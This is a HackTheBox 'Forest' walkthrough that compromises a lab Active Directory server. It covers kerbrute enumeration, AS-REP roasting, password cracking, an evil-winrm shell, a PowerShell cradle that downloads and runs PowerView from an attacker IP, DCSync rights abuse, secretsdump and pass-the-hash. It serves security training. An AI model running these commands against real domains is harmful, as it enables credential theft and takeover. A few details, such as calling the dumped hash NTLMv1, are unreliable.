# HackTheBox - Forest Writeup ###### tags: `writeup` `HackTheBox` `Machine` `Easy` `OSCP` `bloodhound` `impacket` `DCsync` `ASPReroast` `kerbrute` `AD` ## :computer: Port Scanning ```bash # Nmap 7.92 scan initiated Sun Aug 14 11:58:06 2022 as: nmap -sV -T4 -sS -sC -v -oN nmap 10.10.10.161 Nmap scan report for forest.htb (10.10.10.161) Host is up (0.12s latency). Not shown: 989 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 16:05:06Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h26m50s, deviation: 4h02m31s, median: 6m48s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-08-14T16:05:13 |_ start_date: 2022-08-14T16:03:38 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2022-08-14T09:05:14-07:00 Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Aug 14 11:58:34 2022 -- 1 IP address (1 host up) scanned in 27.49 seconds ``` ## Services: - [ ] Port 53 : Simple DNS Plus - [ ] Port 88 : Microsoft Windows Kerberos - [ ] Port 135 : Microsoft Windows RPC - [ ] Port 139 : Windows Netbios-ssn - [ ] Port 389 : Windows Active Directory LDAP - [ ] Port 445 : microsoft-ds Windows Server 2016 Standard 14393 - [ ] 464 : kpasswd5? - [ ] Port 594 : ncacn_http Microsoft Windows RPC over HTTP - [ ] Port 636: tcpwrapped - [ ] Port 3268 : Windows Active Directory LDAP - [ ] Port 3269 : tcpwrapped ## :eye: Enumeration Knowing that we can enumerate kerberos we are going to use kerbrute to bruteforce usernames. ```bash /opt/kerbrute/kerbrute_linux_amd64 userenum --dc HTB.local -d HTB.local /usr/share/seclists/Usernames/Names/names.txt ``` After enumerate with this list I discover this usernames: - [ ] andy - [ ] forest - [ ] lucinda - [ ] mark - [ ] sebastien But looking into this usernames i don't found nothing interesting so we can enumerate with **enum4linux**. ```bash sudo enum4linux -a 10.10.10.161 ``` Reading the resutls of this tool I noticed that there are more users.  Looking the new stuff discovered we have this list. ### Usernames: - [ ] andy@HTB.local - [ ] forest@HTB.local - [ ] lucinda@HTB.local - [ ] mark@HTB.local - [ ] sebastien@HTB.local - [ ] santi@HTB.local - [ ] administrator@HTB.local - [ ] svc-alfresco@HTB.local Looking the usernames at the first look we see that svc-alfresco its a service account so maybe is ASPR-Roastable and we can obtain the kerberos ticket to crack it. ## :bomb: Explotation To do de ASPR-Roastable we are gonna use impacket: ```bash impacket-GetNPUsers HTB.local/svc-alfresco -no-pass ```  We receive the Kerberos TGT and now we can try to crack it with john: We have to put the Kerberos hash into a file and use the following command to crack it. ```bash john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` We receive the following result: >s3rvice ($krb5asrep\$23\$svc-alfresco@HTB.LOCAL) After knowing the user and the password we can use evil-winrm to obtain a shell as svc-alfresco, use the following command: ```bash evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice ``` After that now we have a shell as svc-alfresco, for more info about evil-winrm go to his [github](https://github.com/Hackplayers/evil-winrm).  Now it's time to enumerate and find the way to obtain Administrator priveleges. --- ### ⏫Root Privesc Knowing this is an AD we are gonna start enumerating with Bloodhound, so knowing the credentials for svc-alfresco we can use bloodhound-python ingestor, that can be used remotely and it isn't necessary to upload any file to the machine, we can use the following command: bloohound-python -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d HTB.local -c All This we generate in our machine a few json that we have to upload to Bloodhound as we see in my previous [bloodhound](https://hackmd.io/@Mecanico/BJo-wm9x5) post. After upload it and bloodhound and Start the query select the shortest path to domain admins we see this.  We have to right click on HTB.local and click **Set as Ending Node**:  After that we obtain this graph that show to us the path to make the privilege escalation.  Taking a look into the graph we see that we have to make part of 'EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL' to be capable of use **WriteDacl** to obtain Admin privileges, so adding EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL group to svc-alfresco user we can leverage this account and try to dump the NTLM hashes. Right clicking on WriteDacl inside bloodhound and clicking on help next to on abuse info, it will explain how to abuse from DCsync in my case i recommend to look in a web like [this](https://burmat.gitbook.io/security/hacking/domain-exploitation#add-exploit-dcsync-rights). Reading the Abuse info and the the guide on the web we see, that we have to make this steps: 1. Import PowerView 2. Add-DomainGroupMember (add svc-alfresco to EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL) 3. Create the pass object. 4. Create the Credential Object. 5. And the last, Add-DomainObjectAcl After that we should can dump the credential hashes from the dc. These are the Commands that you have to enter. ```PowerShell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9/PowerView.ps1') Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $pass = ConvertTo-SecureString 's3rvice' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $pass) Add-DomainObjectAcl -Credential $cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity "HTB.LOCAL\Domain Admins" -Rights DCSync ``` ###### Fail attempt In the case that when you add the user to the Exchange Windows Permissions don't work you have to make a script that executes all in once. In my case i found it after doing the machine in the 0xdf [writeup](https://0xdf.gitlab.io/2020/03/21/htb-forest.html#exploit). ```Powershell! Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync ``` After execute the commands or the Script we can use impacket-secretdump to dump the LDAP hashes using the following command: ```bash impacket-secretdump HTB.local/svc-alfresco:s3rvice@10.10.10.161 ``` We receive this something like this:  If you look the entire hash you can see that is a NTLMv1 hash so we can pass-the-hash to Administrator account . Using evil-winrm we can pass the hash it and obtain Administrator shell: ```bash evil-winrm -i 10.10.10.161 -u Administrator -H NT_Hash ```  And that's all folks we obtained Administrator Privileges! Check my media! --- ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)